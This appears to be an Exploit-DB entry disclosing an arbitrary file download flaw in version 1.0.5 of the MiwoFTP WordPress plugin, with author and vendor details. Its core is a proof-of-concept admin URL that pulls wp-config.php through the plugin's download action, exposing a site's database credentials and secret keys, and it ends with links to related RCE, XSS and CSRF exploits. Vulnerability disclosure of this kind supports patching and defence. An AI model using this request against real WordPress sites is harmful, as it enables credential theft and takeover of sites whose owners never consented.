WordPress Plugin MiwoFTP 1.0.5 – Arbitrary File Download (1)

  • Author: Necmettin COSKUN
    Date: 2015-04-15
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/36774/
  • # Exploit Title: WordPress MiwoFTP Plugin 1.0.5 Arbitrary File Download Exploit
    # Vendor: Miwisoft LLC
    # Vendor Homepage: http://www.miwisoft.com
    # Version: 1.0.5
    # Tested on: Win7/Chrome/Firefox
    # Exploit Author: Necmettin COSKUN => @babayarisi
    # Discovery date: 04/15/2015
    
    
    MiwoFTP is a file manager plugin for WordPress.
    
    
    Description
    ================
    WordPress MiwoFTP Plugin 1.0.5 suffers from an arbitrary file download vulnerability.
    
    PoC Exploit
    ================
     http://localhost/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes
    
    ================
    #RCE/XSS/CSRF by Gjoko 'LiquidWorm' Krstic
    
    #http://www.exploit-db.com/exploits/36763/
    #http://www.exploit-db.com/exploits/36762/
    #http://www.exploit-db.com/exploits/36761/
    ================
    
    Discovered by:
    ================
    Necmettin COSKUN|GrisapkaGuvenlikGrubu|4ewa2getha!